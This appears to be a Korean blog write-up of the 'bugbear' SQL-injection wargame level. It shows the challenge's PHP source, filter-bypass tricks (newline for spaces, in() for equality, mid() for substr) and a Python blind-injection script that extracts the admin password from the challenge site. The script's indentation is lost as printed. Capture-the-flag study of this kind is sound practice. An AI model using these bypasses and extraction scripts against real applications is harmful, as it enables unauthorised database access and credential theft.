일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- restapi
- webhacking 처음
- ㅁㅇㅂ??ㅇㅈㄷ ㅎㅇㅌ...
- riceteacatpanda
- DBMS
- 정보보호병 후기
- 동읍면 DB
- 행정지역 DB
- Django
- spring
- Forensic 절차
- 3단계 지역 DB
- frontend
- 인턴 지원
- react
- mysql
- Database
- Layered Architecture
- 소개딩
- EER
- SessionAttribute
- 인턴 후기
- 네이버 인턴
- 메모리 포랜식
- reversing.kr
- 소프트웨어 개발보안 경진대회
- JSTL
- jsp
- PyAmdecoder
- 방명록 만들기
- Today
- Total
웹찢남
Bugbear-writeup 본문
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
$query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
highlight_file(__FILE__);
?>
필터링을 너무 많이 한다....
하나씩 bypass를 해보면
whitespace -> %0a
id='admin' -> id in (\"admin\")
=도안되고 like도 안돼서 >,<로 대체
substr -> mid 등등
다 바꿔버린 코드를 짜자
import re
import requests
import time
flag = ''
length= 0
session =dict(PHPSESSID="fedtrqe1daeckj930s9he4f3te")
for i in range (1,20):
for j in range(48,128):
r=requests.post("https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?no=111%0a||%0aid%0ain%0a(\"admin\")%0a%26%26%0ahex(mid(pw,"+str(i)+",1))<hex("+str(j+1)+")%0a&&%0ahex(mid(pw,"+str(i)+",1))>hex("+str(j-1)+")#",cookies=session)
if 'Hello admin' in r.text:
flag=flag+str(chr(j))
print("finding pw: "+flag)
break
print("pw "+flag)
'WEB_HACKING > los.rubiya.kr' 카테고리의 다른 글
Assassin-writeup (0) | 2019.12.27 |
---|---|
Giant-writeup (0) | 2019.12.27 |
Darkknight-writeup (0) | 2019.12.27 |
Golem-writeup (0) | 2019.12.27 |
Skeleton-writeup (0) | 2019.12.27 |